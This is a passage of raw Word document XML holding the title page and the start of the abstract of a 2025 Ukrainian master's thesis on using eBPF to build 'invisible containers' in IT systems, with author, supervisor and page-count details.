          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рік</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>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lastRenderedPageBreak/>
        <w:t>МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ</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НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ «ПОЛТАВСЬКА ПОЛІТЕХНІКА</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ІМЕНІ ЮРІЯ КОНДРАТЮКА»</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 xml:space="preserve">НАВЧАЛЬНО-НАУКОВИЙ ІНСТИТУТ ІНФОРМАЦІЙНИХ </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ТЕХНОЛОГІЙ І РОБОТЕТЕХНІКИ</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 xml:space="preserve">КАФЕДРА КОМП’ЮТЕРНИХ ТА ІНФОРМАЦІЙНИХ </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ТЕХНОЛОГІЙ І СИСТЕМ</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 xml:space="preserve">КВАЛІФІКАЦІЙНА РОБОТА </w:t>
      </w:r>
      <w:r w:rsidR="004C4D9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>МАГІСТРА</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Спеціальність 123 «Комп’ютерна інженерія»</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на тему</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96CA1" w:rsidRPr="00C60979" w:rsidRDefault="00E96CA1" w:rsidP="00E96CA1">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lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C60979">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Інтеграція </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для побудови невидимих кон</w:t>
      </w:r>
      <w:r w:rsidR="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тейнерів в сучасних ІТ системах</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60979">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>»</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lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Студент</w:t>
      </w:r>
      <w:r w:rsidR="00971B89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> групи 6</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ТК </w:t>
      </w:r>
      <w:r w:rsidR="005A4215">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Бакая Романа</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lang w:val="uk-UA"/>
        </w:rPr>
      </w:pP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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pP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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">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r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Керівник роботи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00AE68C7" w:rsidP="00A11308">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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="005A4215">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.т.н</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A4215">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>., професор</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="005A4215" w:rsidP="00A11308">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="5954"/>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Фесенко Тетяна Григорівна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">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r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завідувач кафедри</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A11308">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к</w:t>
      </w:r>
      <w:r w:rsidR="00AE68C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.ф.-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE68C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>м.н</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE68C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Двірна</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> О.А.</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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308"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
    <w:p w:rsidR="0074604D" w:rsidRDefault="0074604D"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uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308"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Полтава</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рік</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>РЕФЕРАТ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Тема кваліфікаційної роботи: “</w:t>
      </w:r>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Інтеграція </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B4111" w:rsidRPr="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для побудови невидимих кон</w:t>
      </w:r>
      <w:r w:rsidR="001B4111">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тейнерів в сучасних ІТ системах</w:t>
      </w:r>
      <w:r w:rsidRPr="00913B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A1130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Автор роботи</w:t>
      </w:r>
      <w:r w:rsidRPr="00913B0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5A4215">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Бакай Роман Андрійович.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Керівник роботи: </w:t>
      </w:r>
      <w:r w:rsidR="005A4215">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>доктор технічних наук, професор Фесенко Тетяна Григорівна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A1130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Загальний обсяг роботи: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30D8A">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сторін</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">и. </w:t>
      </w:r>
      <w:r w:rsidRPr="006707F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Кількість ілюстрацій</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE6AAF" w:rsidRPr="00EE6AAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00913B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006707F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Кількість</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006707F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">бібліографічних </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">посилань – </w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>посилання.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31695" w:rsidRDefault="00721BFD" w:rsidP="00C31695">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АРХІТЕКТУРА</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
